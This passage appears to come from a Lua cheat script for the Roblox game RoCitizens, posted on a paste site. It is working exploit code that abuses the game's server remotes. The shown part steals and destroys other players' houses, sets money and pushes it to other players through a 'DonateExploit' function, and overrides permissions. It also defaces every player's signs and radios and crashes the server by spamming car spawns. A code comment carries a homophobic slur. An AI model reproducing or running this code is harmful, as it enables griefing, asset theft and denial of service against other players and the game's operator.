  1948. SaveData["FurnData"][v.Name .. i]["CFrame"] = {v.PrimaryPart.CFrame:components()}
  1949. end
  1950. end
  1951. end
  1952.  
  1953. for _, v in next, Colors:GetChildren() do
  1954. SaveData["Variables"][v.Name] = v.Value
  1955. end
  1956.  
  1957.  
  1958. pcall(function() writefile(HouseName .. ".txt", Http:JSONEncode(SaveData)) end)
  1959. pcall(function() Synapse:WriteFile(HouseName .. ".txt", Http:JSONEncode(SaveData)) end)
  1960. local hint = Instance.new("Hint", game.CoreGui)
  1961. hint.Text = "House Saved to file: " .. HouseName
  1962. wait(5)
  1963. hint:Destroy()
  1964. end
  1965.  
  1966. function LoadHouse(HouseName)
  1967. local Hint = Instance.new("Hint", CoreGui)
  1968. Hint.Text = "Loading house: " .. HouseName
  1969.  
  1970. local HouseData = nil
  1971. local Succ = pcall(function() HouseData = readfile(HouseName .. ".txt") end)
  1972. if not Succ then
  1973. local Succ2 = pcall(function() HouseData = readfile(HouseName .. ".txt") end)
  1974. if not Succ2 then
  1975. Hint:Destroy()
  1976. return
  1977. end
  1978. end
  1979.  
  1980. HouseData = Http:JSONDecode(HouseData)
  1981.  
  1982. local GetAProperty = FindEmptyProperty(HouseData.Prop)
  1983. if #GetAProperty > 1 then
  1984. GetAProperty = GetAProperty[math.random(1, #GetAProperty)]
  1985. else
  1986. GetAProperty = GetAProperty[1]
  1987. end
  1988.  
  1989. if GetAProperty == nil then
  1990. return
  1991. end
  1992. local GetHouse = FindHouse(MyPlr)
  1993. if GetHouse then
  1994. ComRelay.House.ResetProperty:FireServer(GetHouse)
  1995. AntiHouseDestroy = false
  1996. RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "OFF"
  1997. RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(1, 0, 0)
  1998. end
  1999.  
  2000. workspace.CommunicationRelays.HomePurchase.House:InvokeServer(GetAProperty, {["HouseType"] = HouseData["HouseType"], ["Furniture"] = { }, ["Variables"] = HouseData["Variables"]})
  2001.  
  2002. wait(0.5)
  2003.  
  2004. GetHouse = FindHouse(MyPlr)
  2005. local Num = 1
  2006. for i, v in next, HouseData.FurnData do
  2007. Hint.Text = "Loading house: " .. HouseName .. " " .. Num .. "/" .. #HouseData.FurnData
  2008. if v.Color ~= nil then
  2009. local C = CFrame.new(v.CFrame[1], v.CFrame[2], v.CFrame[3], v.CFrame[4], v.CFrame[5], v.CFrame[6], v.CFrame[7], v.CFrame[8], v.CFrame[9], v.CFrame[10], v.CFrame[11], v.CFrame[12])
  2010. local sexy_bitch = workspace.CommunicationRelays.House.PlaceFurniture:InvokeServer(v.Name, C, GetHouse, v.Item, v.Color)
  2011. if sexy_bitch.Name == "SS_Wooden Sign" then
  2012. ComRelay.Interaction.EditSign:FireServer(sexy_bitch, v.Text)
  2013. end
  2014. else
  2015. local C = CFrame.new(v.CFrame[1], v.CFrame[2], v.CFrame[3], v.CFrame[4], v.CFrame[5], v.CFrame[6], v.CFrame[7], v.CFrame[8], v.CFrame[9], v.CFrame[10], v.CFrame[11], v.CFrame[12])
  2016. ComRelay.House.PlaceFurniture:InvokeServer(v.Name, C, GetHouse, v.Item, {["Display"] = v.Display, ["Color1"] = v.Color1, ["Color2"] = v.Color2})
  2017. end
  2018. Num = Num + 1
  2019. end
  2020. MyPlr.PlayerGui.Main.MyHouse.Value = GetHouse
  2021. MyChar.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
  2022. Hint.Text = "House loaded. :)"
  2023. wait(5)
  2024. Hint:Destroy()
  2025. end
  2026.  
  2027. RoCitizensGUI.Main.Players.Players.PlayerBOX.FocusLost:connect(function()
  2028. local Plr = FindPlayer(RoCitizensGUI.Main.Players.Players.PlayerBOX.Text)
  2029. if Plr then
  2030. SelectedPlayer = Plr
  2031. RoCitizensGUI.Main.Players.Players.PlayerBOX.Text = Plr.Name
  2032. RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: " .. Plr.Name
  2033. else
  2034. RoCitizensGUI.Main.Players.Players.PlayerBOX.Text = "Enter Player Name"
  2035. end
  2036. end)
  2037.  
  2038. RoCitizensGUI.Main.Players.Players.AllPlayers.MouseButton1Click:connect(function()
  2039. SelectedPlayer = "Everyone"
  2040. RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: Everyone"
  2041. end)
  2042.  
  2043. RoCitizensGUI.Main.Functions.Func3.Teleport.MouseButton1Click:connect(function()
  2044. local MyChar = MyPlr.Character
  2045. local TheirChar = nil
  2046. if SelectedPlayer ~= "Everyone" then
  2047. TheirChar = SelectedPlayer.Character
  2048. if MyChar and TheirChar then
  2049. local MyTor = MyChar.HumanoidRootPart
  2050. local TheirTor = TheirChar.HumanoidRootPart
  2051. MyTor.CFrame = TheirTor.CFrame * CFrame.new(Vector3.new(0, 0, 2))
  2052. end
  2053. else
  2054. local Hint = Instance.new("Hint", CoreGui)
  2055. Hint.Text = "Selected Player cannot be everyone!"
  2056. wait(5)
  2057. Hint:Destroy()
  2058. end
  2059. end)
  2060.  
  2061. RoCitizensGUI.Main.Functions.Func1.MoneyBox.FocusLost:connect(function()
  2062. local Num = tonumber(RoCitizensGUI.Main.Functions.Func1.MoneyBox.Text) or 0
  2063. if Num > 2147483647 then
  2064. Num = 2147483647
  2065. end
  2066. if Num < -2147483647 then
  2067. Num = -2147483647
  2068. end
  2069. RoCitizensGUI.Main.Functions.Func1.MoneyVal.Value = Num
  2070.  
  2071. RoCitizensGUI.Main.Functions.Func1.MoneyBox.Text = "$" .. format_int(Num)
  2072. end)
  2073.  
  2074. RoCitizensGUI.Main.Functions.Func2.MoneyBox.FocusLost:connect(function()
  2075. local Num = tonumber(RoCitizensGUI.Main.Functions.Func2.MoneyBox.Text) or 0
  2076. if Num > 2147483647 then
  2077. Num = 2147483647
  2078. end
  2079. if Num < 0 then -- Don't be a fucking dick head faggot.
  2080. Num = 1
  2081. end
  2082.  
  2083. RoCitizensGUI.Main.Functions.Func2.MoneyVal.Value = Num
  2084.  
  2085. RoCitizensGUI.Main.Functions.Func2.MoneyBox.Text = "$" .. format_int(Num)
  2086. end)
  2087.  
  2088. RoCitizensGUI.Main.Functions.Func1.SetMoney.MouseButton1Click:connect(function()
  2089. local Math = RoCitizensGUI.Main.Functions.Func1.MoneyVal.Value - MyMoney.Value
  2090. ChangeMoney:Fire(Math)
  2091. end)
  2092.  
  2093. RoCitizensGUI.Main.Functions.Func2.SendMoney.MouseButton1Click:connect(function()
  2094. if SelectedPlayer ~= "Everyone" and SelectedPlayer ~= MyPlr then
  2095. DonateExploit(SelectedPlayer, RoCitizensGUI.Main.Functions.Func2.MoneyVal.Value)
  2096. else
  2097. for _, v in next, Plrs:GetPlayers() do
  2098. if v ~= MyPlr then
  2099. if v:FindFirstChild("Money") then
  2100. DonateExploit(v, RoCitizensGUI.Main.Functions.Func2.MoneyVal.Value)
  2101. end
  2102. end
  2103. end
  2104. end
  2105. end)
  2106.  
  2107. RoCitizensGUI.Main.Functions.Func4.Teleport.MouseButton1Click:connect(function()
  2108. if SelectedPlayer ~= "Everyone" and SelectedPlayer ~= MyPlr then
  2109. StealHouse()
  2110. else
  2111. local Hint = Instance.new("Hint", CoreGui)
  2112. Hint.Text = "Cannot steal everyone's house!"
  2113. wait(5)
  2114. Hint:Destroy()
  2115. end
  2116. end)
  2117.  
  2118. RoCitizensGUI.Main.Functions.Func5.DestroyBut.MouseButton1Click:connect(function()
  2119. DestroyHouse(SelectedPlayer)
  2120. end)
  2121.  
  2122. RoCitizensGUI.Main.Functions.Func6.Change.MouseButton1Click:connect(function()
  2123. local id = tonumber(RoCitizensGUI.Main.Functions.Func6.AudioBox.Text) or 856173428
  2124.  
  2125. local MyChar = MyPlr.Character
  2126. local MyTor = MyChar.HumanoidRootPart
  2127. local SavePos = MyTor.CFrame
  2128.  
  2129. local GetHousePlrs = FindPlayersWithAHouse()
  2130. for _, v in next, GetHousePlrs do
  2131. local TheirHouse = FindHouse(v)
  2132. if TheirHouse then
  2133. MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
  2134. repeat
  2135. if not TheirHouse:FindFirstChild("Owner") then
  2136. break
  2137. end
  2138. MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
  2139. Run.RenderStepped:wait()
  2140. until TheirHouse.StaticAssets:FindFirstChild("Furniture")
  2141. if not TheirHouse:FindFirstChild("Owner") then
  2142. return
  2143. end
  2144. for _, vv in next, TheirHouse.StaticAssets.Furniture:GetChildren() do
  2145. if vv.Name:find("VC_Radio") or vv.Name:find("VC_Stereo") then
  2146. ComRelay.Interaction.ChangeSound:FireServer(vv, tostring(id))
  2147. game.StarterGui.RoRadio.RemoveSystem:Fire(vv)
  2148. end
  2149. end
  2150. end
  2151. end
  2152.  
  2153. MyTor.CFrame = SavePos
  2154. end)
  2155.  
  2156. RoCitizensGUI.Main.Functions.Func14.SignsB.MouseButton1Click:connect(function()
  2157. local MyChar = MyPlr.Character
  2158. local MyTor = MyChar.HumanoidRootPart
  2159. local SavePos = MyTor.CFrame
  2160.  
  2161. local GetHousePlrs = FindPlayersWithAHouse()
  2162. for _, v in next, GetHousePlrs do
  2163. local TheirHouse = FindHouse(v)
  2164. if TheirHouse then
  2165. MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
  2166. repeat
  2167. if not TheirHouse:FindFirstChild("Owner") then
  2168. break
  2169. end
  2170. MyTor.CFrame = CFrame.new(TheirHouse.Base.Position + Vector3.new(0, 6, 0))
  2171. Run.RenderStepped:wait()
  2172. until TheirHouse.StaticAssets:FindFirstChild("Furniture")
  2173. if not TheirHouse:FindFirstChild("Owner") then
  2174. return
  2175. end
  2176. for _, vv in next, TheirHouse.StaticAssets.Furniture:GetChildren() do
  2177. if vv.Name == "SS_Wooden Sign" then
  2178. ComRelay.Interaction.EditSign:FireServer(vv, RoCitizensGUI.Main.Functions.Func14.SignsText.Text)
  2179. end
  2180. end
  2181. end
  2182. end
  2183.  
  2184. MyTor.CFrame = SavePos
  2185. end)
  2186.  
  2187. RoCitizensGUI.Main.Functions.Func7.Permissions.MouseButton1Click:connect(function()
  2188. PermsExploit = not PermsExploit
  2189. if PermsExploit then
  2190. RoCitizensGUI.Main.Functions.Func7.Permissions.Text = "ON"
  2191. RoCitizensGUI.Main.Functions.Func7.Permissions.TextColor3 = Color3.new(0, 1, 0)
  2192. else
  2193. RoCitizensGUI.Main.Functions.Func7.Permissions.Text = "OFF"
  2194. RoCitizensGUI.Main.Functions.Func7.Permissions.TextColor3 = Color3.new(1, 0, 0)
  2195. end
  2196. end)
  2197.  
  2198. RoCitizensGUI.Main.Functions.Func8.Lockpick.MouseButton1Click:connect(function()
  2199. LockpickExploit = not LockpickExploit
  2200. ExplosivesExploit = false
  2201. if LockpickExploit then
  2202. RoCitizensGUI.Main.Functions.Func8.Lockpick.Text = "ON"
  2203. RoCitizensGUI.Main.Functions.Func8.Lockpick.TextColor3 = Color3.new(0, 1, 0)
  2204. RoCitizensGUI.Main.Functions.Func9.Explosives.Text = "OFF"
  2205. RoCitizensGUI.Main.Functions.Func9.Explosives.TextColor3 = Color3.new(1, 0, 0)
  2206. else
  2207. RoCitizensGUI.Main.Functions.Func8.Lockpick.Text = "OFF"
  2208. RoCitizensGUI.Main.Functions.Func8.Lockpick.TextColor3 = Color3.new(1, 0, 0)
  2209. end
  2210. end)
  2211.  
  2212. RoCitizensGUI.Main.Functions.Func9.Explosives.MouseButton1Click:connect(function()
  2213. ExplosivesExploit = not ExplosivesExploit
  2214. LockpickExploit = false
  2215. if ExplosivesExploit then
  2216. RoCitizensGUI.Main.Functions.Func9.Explosives.Text = "ON"
  2217. RoCitizensGUI.Main.Functions.Func9.Explosives.TextColor3 = Color3.new(0, 1, 0)
  2218. RoCitizensGUI.Main.Functions.Func8.Lockpick.Text = "OFF"
  2219. RoCitizensGUI.Main.Functions.Func8.Lockpick.TextColor3 = Color3.new(1, 0, 0)
  2220. else
  2221. RoCitizensGUI.Main.Functions.Func9.Explosives.Text = "OFF"
  2222. RoCitizensGUI.Main.Functions.Func9.Explosives.TextColor3 = Color3.new(1, 0, 0)
  2223. end
  2224. end)
  2225.  
  2226. RoCitizensGUI.Main.Functions.Func10.Clothes.MouseButton1Click:connect(function()
  2227. for _, v in next, RepStor.Shirt:GetChildren() do
  2228. MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
  2229. end
  2230. for _, v in next, RepStor.Pants:GetChildren() do
  2231. MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
  2232. end
  2233. for _, v in next, RepStor.Hair:GetChildren() do
  2234. MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
  2235. end
  2236. for _, v in next, RepStor.Hat:GetChildren() do
  2237. MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
  2238. end
  2239. for _, v in next, RepStor.Glasses:GetChildren() do
  2240. MyPlr.PlayerGui.GameValues.CosmeticData.AddItem:Invoke(v.Name)
  2241. end
  2242. end)
  2243.  
  2244. RoCitizensGUI.Main.Functions.Func11.Furniture.MouseButton1Click:connect(function()
  2245. local FurnGUI = MyPlr.PlayerGui.Main.Field.Panel2.Inventory.FurnitureFrame
  2246. for _, v in next, RepStor.Furniture:GetChildren() do
  2247. local Clo = v:clone()
  2248. Clo.Parent = FurnGUI
  2249. Clo.Visible = true
  2250. print(Clo:GetFullName())
  2251. end
  2252. end)
  2253.  
  2254. RoCitizensGUI.Main.Functions.Func12.HouseName.ClearTextOnFocus = false
  2255. RoCitizensGUI.Main.Functions.Func12.HouseSave.MouseButton1Click:connect(function()
  2256. SaveHouse(RoCitizensGUI.Main.Functions.Func12.HouseName.Text)
  2257. end)
  2258.  
  2259. RoCitizensGUI.Main.Functions.Func13.HouseName.ClearTextOnFocus = false
  2260. RoCitizensGUI.Main.Functions.Func13.HouseLoad.MouseButton1Click:connect(function()
  2261. LoadHouse(RoCitizensGUI.Main.Functions.Func13.HouseName.Text)
  2262. end)
  2263.  
  2264. RoCitizensGUI.Main.Functions.Func15.CrashB.MouseButton1Click:connect(function()
  2265. local Hint = Instance.new("Hint", CoreGui)
  2266. Hint.Text = "May take a few minutes to completely crash the server."
  2267. for i = 0, 5 do
  2268. Run:BindToRenderStep("HAX" .. i, Enum.RenderPriority.First.Value-1, function()
  2269. ComRelay.Car.SpawnCar:InvokeServer({["SpawnLocation"] = "Dealership", ["CurrentSpecs"] = {["Hood"] = "Standard", ["Spoiler"] = "None", ["SpoilerColor"] = "Mid gray", ["PrimaryColor"] = "Medium blue", ["SkirtsColor"] = "Mid gray", ["Price"] = 4400, ["Initiate"] = false, ["Skirts"] = "None", ["Frame"] = "Intrepid", ["SecondaryColor"] = "Medium stone grey", ["RimColor"] = "Medium stone grey"}})
  2270. end)
  2271. end
  2272. end)
  2273.  
  2274. RoCitizensGUI.Main.Functions.Func16.AntiD.MouseButton1Click:connect(function()
  2275. AntiHouseDestroy = not AntiHouseDestroy
  2276. if AntiHouseDestroy then
  2277. local GetHouse = FindHouse(MyPlr)
  2278. if not GetHouse then
  2279. return
  2280. end
  2281. -- v.Name, C, GetHouse, v.Item, v.Color
  2282. local Furn = RepStor.FurnitureModels["SS_Wooden Sign"]
  2283. AntiHouseStealSign = ComRelay.House.PlaceFurniture:InvokeServer(Furn.Name, CFrame.new(Vector3.new(0, -5, 0)), GetHouse, "Splinter Sale Wooden Sign", "Reddish brown")
  2284. ComRelay.Interaction.EditSign:FireServer(AntiHouseStealSign, "can't steal house")
  2285.  
  2286. local Hint = Instance.new("Hint", CoreGui)
  2287. Hint.Text = "DO NOT DESTROY THE SIGN THAT WAS JUST SPAWNED IN."
  2288. RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "ON"
  2289. RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(0, 1, 0)
  2290. wait(8)
  2291. Hint:Destroy()
  2292. else
  2293. ComRelay.House.RemoveFurniture:InvokeServer(AntiHouseStealSign)
  2294. AntiHouseStealSign = nil
  2295. RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "OFF"
  2296. RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(1, 0, 0)
  2297. end
  2298. end)
  2299.  
  2300.  
  2301. UserInput.InputBegan:connect(function(input, ingui)
  2302. if not ingui then
  2303. if input.UserInputType == Enum.UserInputType.Keyboard then
  2304. if input.KeyCode == Enum.KeyCode.P then
  2305. RoCitizensGUI.Main.Visible = not RoCitizensGUI.Main.Visible
  2306. end
  2307. end
  2308. end
  2309. end)
  2310.  
  2311. Plrs.PlayerRemoving:connect(function(Plr)
  2312. if Plr == SelectedPlayer then
  2313. SelectedPlayer = Plrs:GetPlayers()[math.random(1, #Plrs:GetPlayers())]
  2314. RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: " .. SelectedPlayer.Name
  2315. end
  2316. end)
  2317.  
  2318.  
  2319. coroutine.resume(coroutine.create(function()
  2320. while true do
  2321. if PermsExploit then
  2322. for _, v in next, Plrs:GetPlayers() do
  2323. if v ~= MyPlr then
  2324. local House = FindHouse(v)
  2325. if House then
  2326. ComRelay.House.SetPermissions:FireServer(GeneratePermsTable(v), House)
  2327. end
  2328. end
  2329. Run.RenderStepped:wait()
  2330. end
  2331. end
  2332. if LockpickExploit then
  2333. EquipItem("Lock Kit")
  2334. end
  2335. if ExplosivesExploit then
  2336. EquipItem("Bomb")
  2337. end
  2338. wait(1)
  2339. end
  2340. end))
Add Comment
Please, Sign In to add comment